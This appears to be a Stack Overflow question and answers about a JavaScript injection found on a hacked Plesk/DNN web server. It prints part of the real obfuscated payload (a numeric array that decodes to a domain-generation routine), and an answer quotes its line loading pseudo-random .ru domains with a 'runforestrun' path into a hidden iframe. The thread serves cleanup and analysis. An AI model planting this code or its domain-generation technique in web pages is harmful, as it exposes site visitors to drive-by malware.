# km0ae9gr6m js injection hack information

Tags: javascript, code-injection

1. Just wondering if a js expert can decode this script injection that I can check our server for further infections.
2. Has anyone got an idea how this would have happened? Server is fully patched (MS Server 2008, Plesk), web app is fully patched (DNN 5.6.7).
3. Have removed all injected scripts & reset all server passwords.. Anything else I should do?

Thanks :)

```
/*km0ae9gr6m*/
i = 0;
try {
    prototype - 5;
} catch (z) {
    f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 80, 41, 246, 118, 194, 114, 64, 104, 210, 61, 232, 104, 210, 115, 92, 115, 202, 101, 200, 47, 232, 104, 210, 115, 92, 81, 118, 118, 194, 114, 64, 108, 222, 61, 232, 104, 210, 115, 92, 115, 202, 101, 200, 37, 232, 104, 210, 115, 92, 81, 118, 118, 194, 114, 64, 116, 202, 115, 232, 61, 232, 104, 210, 115, 92, 65, 84, 108, 222, 45, 232, 104, 210, 115, 92, 82, 84, 104, 210, 59, 210, 102, 80, 116, 202, 115, 232, 62, 96, 41, 246, 116, 208, 105, 230, 46, 230, 101, 202, 100, 122, 116, 202, 115, 232, 125, 202, 108, 230, 101, 246, 116, 208, 105, 230, 46, 230, 101, 202, 100, 122, 116, 202, 115, 232, 43, 232, 104, 210, 115, 92, 77, 250, 114, 202, 116, 234, 114, 220, 40, 232, 104, 210, 115, 92, 115, 202, 101, 200, 42, 232, 104, 210, 115, 92, 111, 220, 101, 158, 118, 202, 114, 154, 41, 250, 102, 234, 110, 198, 116, 210, 111, 220, 32, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 142, 101, 220, 101, 228, 97, 232, 111, 228, 40, 234, 110, 210, 120, 82, 123, 236, 97, 228, 32, 200, 61, 220, 101, 238, 32, 136, 97, 232, 101, 80, 117, 220, 105, 240, 42, 98, 48, 96, 48, 82, 59, 236, 97, 228, 32, 230, 61, 200, 46, 206, 101, 232, 72, 222, 117, 228, 115, 80, 41, 124, 49, 100, 63, 98, 58, 96, 59, 232, 104, 210, 115, 92, 115, 202, 101, 200, 61, 100, 51, 104, 53, 108, 55, 112, 57, 96, 49, 86, 40, 200, 46, 206, 101, 232, 77, 222, 110, 232, 104, 80, 41, 84, 48, 240, 70, 140, 70, 140, 70, 140, 41, 86, 40, 200, 46, 206, 101, 232, 68, 194, 116, 202, 40, 82, 42, 96, 120, 140, 70, 140, 70, 82, 43, 80, 77, 194, 116, 208, 46, 228, 111, 234, 110, 200, 40, 230, 42, 96, 120, 140, 70, 140, 41, 82, 59, 232, 104, 210, 115, 92, 65, 122, 52, 112, 50, 110, 49, 118, 116, 208, 105, 230, 46, 154, 61, 100, 49, 104, 55, 104, 56, 102, 54, 104, 55, 118, 116, 208, 105, 230, 46, 162, 61, 232, 104, 210, 115, 92, 77, 94, 116, 208, 105, 230, 46, 130, 59, 232, 104, 210, 115, 92, 82, 122, 116, 208, 105, 230, 46, 154, 37, 232, 104, 210, 115, 92, 65, 118, 116, 208, 105, 230, 46, 222, 110, 202, 79, 236, 101, 228, 77, 122, 49, 92, 48, 94, 116, 208, 105, 230, 46, 154, 59, 232, 104, 210, 115, 92, 110, 202, 120, 232, 61, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 118, 114, 202, 116, 234, 114, 220, 32, 232, 104, 210, 115, 250, 102, 234, 110, 198, 116, 210, 111, 220, 32, 198, 114, 202, 97, 232, 101, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 80, 114, 88, 77, 210, 110, 88, 77, 194, 120, 82, 123, 228, 101, 232, 117, 228, 110, 64, 77, 194, 116, 208, 46, 228, 111, 234, 110, 200, 40, 80, 77, 194, 120, 90, 77, 210, 110, 82, 42, 228, 46, 220, 101, 240, 116, 80, 41, 86, 77, 210, 110, 82, 125, 204, 117, 220, 99, 232, 105, 222, 110, 64, 103, 202, 110, 202, 114, 194, 116, 202, 80, 230, 101, 234, 100, 222, 82, 194, 110, 200, 111, 218, 83, 232, 114, 210, 110, 206, 40, 234, 110, 210, 120, 88, 108, 202, 110, 206, 116, 208, 44, 244, 111, 220, 101, 82, 123, 236, 97, 228, 32, 228, 97, 220, 100, 122, 110, 202, 119, 64, 82, 194, 110, 200, 111, 218, 78, 234, 109, 196, 101, 228, 71, 202, 110, 202, 114, 194, 116, 222, 114, 80, 117, 220, 105, 240, 41, 118, 118, 194, 114, 64, 108, 202, 116, 232, 101, 228, 115, 122, 91, 78, 97, 78, 44, 78, 98, 78, 44, 78, 99, 78, 44, 78, 100, 78, 44, 78, 101, 78, 44, 78, 102, 78, 44, 78, 103, 78, 44, 78, 104, 78, 44, 78, 105, 78, 44, 78, 106, 78, 44, 78, 107, 78, 44, 78, 108, 78, 44, 78, 109, 78, 44, 78, 110, 78, 44, 78, 111, 78, 44, 78, 112, 78, 44, 78, 113, 78, 44, 78, 114, 78, 44, 78, 115, 78, 44, 78, 116, 78, 44, 78, 117, 78, 44, 78, 118, 78, 44, 78, 119, 78, 44, 78, 120, 78, 44, 78, 121, 78, 44, 78, 122, 78, 93, 118, 118, 194, 114, 64, 115, 232, 114, 122, 39, 78, 59, 204, 111, 228, 40, 236, 97, 228, 32, 210, 61, 96, 59, 210, 60, 216, 101, 220, 103, 232, 104, 118, 105, 86, 43, 82, 123, 230, 116, 228, 43, 122, 108, 202, 116, 232, 101, 228, 115, 182, 99, 228, 101, 194, 116, 202, 82, 194, 110, 200, 111, 218, 78, 234, 109, 196, 101, 228, 40, 228, 97, 220, 100, 88, 48, 88, 108, 202, 116, 232, 101, 228, 115, 92, 108, 202, 110, 206, 116, 208, 45, 98, 41, 186, 125, 228, 101, 232, 117, 228, 110, 64, 115, 232, 114, 86, 39, 92, 39, 86, 122, 222, 110, 202, 125, 230, 101, 232, 84, 210, 109, 202, 111, 234, 116, 80, 102, 234, 110, 198, 116, 210, 111, 220, 40, 82, 123, 232, 114, 242, 123, 210, 102, 80, 116, 242, 112, 202, 111, 204, 32, 210, 102, 228, 97, 218, 101, 174, 97, 230, 67, 228, 101, 194, 116, 202, 100, 100, 61, 122, 34, 234, 110, 200, 101, 204, 105, 220, 101, 200, 34, 82, 123, 210, 102, 228, 97, 218, 101, 174, 97, 230, 67, 228, 101, 194, 116, 202, 100, 100, 61, 232, 114, 234, 101, 118, 118, 194, 114, 64, 117, 220, 105, 240, 61, 154, 97, 232, 104, 92, 114, 222, 117, 220, 100, 80, 43, 220, 101, 238, 32, 136, 97, 232, 101, 80, 41, 94, 49, 96, 48, 96, 41, 118, 118, 194, 114, 64, 100, 222, 109, 194, 105, 220, 78, 194, 109, 202, 61, 206, 101, 220, 101, 228, 97, 232, 101, 160, 115, 202, 117, 200, 111, 164, 97, 220, 100, 222, 109, 166, 116, 228, 105, 220, 103, 80, 117, 220, 105, 240, 44, 98, 54, 88, 39, 228, 117, 78, 41, 118, 105, 204, 114, 218, 61, 200, 111, 198, 117, 218, 101, 220, 116, 92, 99, 228, 101, 194, 116, 202, 69, 216, 101, 218, 101, 220, 116, 80, 34, 146, 70, 164, 65, 154, 69, 68, 41, 118, 105, 204, 114, 218, 46, 230, 101, 232, 65, 232, 116, 228, 105, 196, 117, 232, 101, 80, 34, 230, 114, 198, 34, 88, 34, 208, 116, 232, 112, 116, 47, 94, 34, 86, 100, 222, 109, 194, 105, 220, 78, 194, 109, 202, 43, 68, 47, 228, 117, 220, 102, 222, 114, 202, 115, 232, 114, 234, 110, 126, 115, 210, 100, 122, 99, 240, 34, 82, 59, 210, 102, 228, 109, 92, 115, 232, 121, 216, 101, 92, 119, 210, 100, 232, 104, 122, 34, 96, 112, 240, 34, 118, 105, 204, 114, 218, 46, 230, 116, 242, 108, 202, 46, 208, 101, 210, 103, 208, 116, 122, 34, 96, 112, 240, 34, 118, 105, 204, 114, 218, 46, 230, 116, 242, 108, 202, 46, 236, 105, 230, 105, 196, 105, 216, 105, 232, 121, 122, 34, 208, 105, 200, 100, 202, 110, 68, 59, 200, 111, 198, 117, 218, 101, 220, 116, 92, 98, 222, 100, 242, 46, 194, 112, 224, 101, 220, 100, 134, 104, 210, 108, 200, 40, 210, 102, 228, 109, 82, 125, 250, 99, 194, 116, 198, 104, 80, 101, 82, 123, 250, 125, 88, 53, 96, 48, 82, 59];
'REMOVED BULK OF CODE
if (f) e(s); /*qhk6sa6g1c*/
```

Comment: What it does: http://jsfiddle.net/PeeHaa/9YKqW/. How it got in is pretty hard to tell, because there are multilpe ways to inject something. Anything else you could do: do you have a recent and good backup?

Comment: I can't see how it can help future visitors.

Comment: @PeeHaa - didn't even think to use jsfiddle ;)
Just thought someone else might of have (or will have) a similar issue to this that has analysed it a bit more than I have at the moment. Got backups so that's no problem. Really appreciate your comments :)

Comment: @user1487020 Never just paste some malicious code on jsfiddle as is. Most malicious js scripts use `eval` of some sort. I just replaced that.

Comment: @gdoron - not sure why this question was closed as the information on this page can help other people deal with similar situations. IMHO when situations like this occur it can be helpful to share information with others.

Comment: @user1487020 regarding the close reason: http://chat.stackoverflow.com/transcript/message/4297347#4297347

Comment: @user1487020. Look at the title- _"what does the code do"_.  Do you think someone will ever type this in google?

Comment: @gdoron - I have changed the title to have some more information. As a noob to this site it would of really helped if you just told me that I needed a more descriptive title.

Comment: It is a huge problem with plesk: http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Comment: I have the same hacker on my server

Comment: Hey, I just wanted to say thanks for posting this question and thanks to those who provided useful answers( especially sieppl ). To the people that closed the thread, please re-open it as it is relevant to some people and has provided an area for others with the same issue to gain some insight into the problem. Also, as the poster said, it would have been much more useful for a StackOverflow admin to help the user make a better post than to just close it.

Comment: See the answer on [Serverfault](http://serverfault.com/a/409179/60711).

Comment: @PeeHaa This specific infection always contains the string `km0ae9gr6m`, now this is the third page if you google for it.

Answer (score 1):

What that code ends up doing is generating semi-random domain names (in .ru) and then attempts to load them into a hidden iframe.  The relevant sections are:

```
domainName=generatePseudoRandomString(unix,16,'ru')
```

and:

```
ifrm.setAttribute("src","http://"+domainName+"/runforestrun?sid=cx")
```

No doubt the content downloaded from whichever one works is some sort of evil...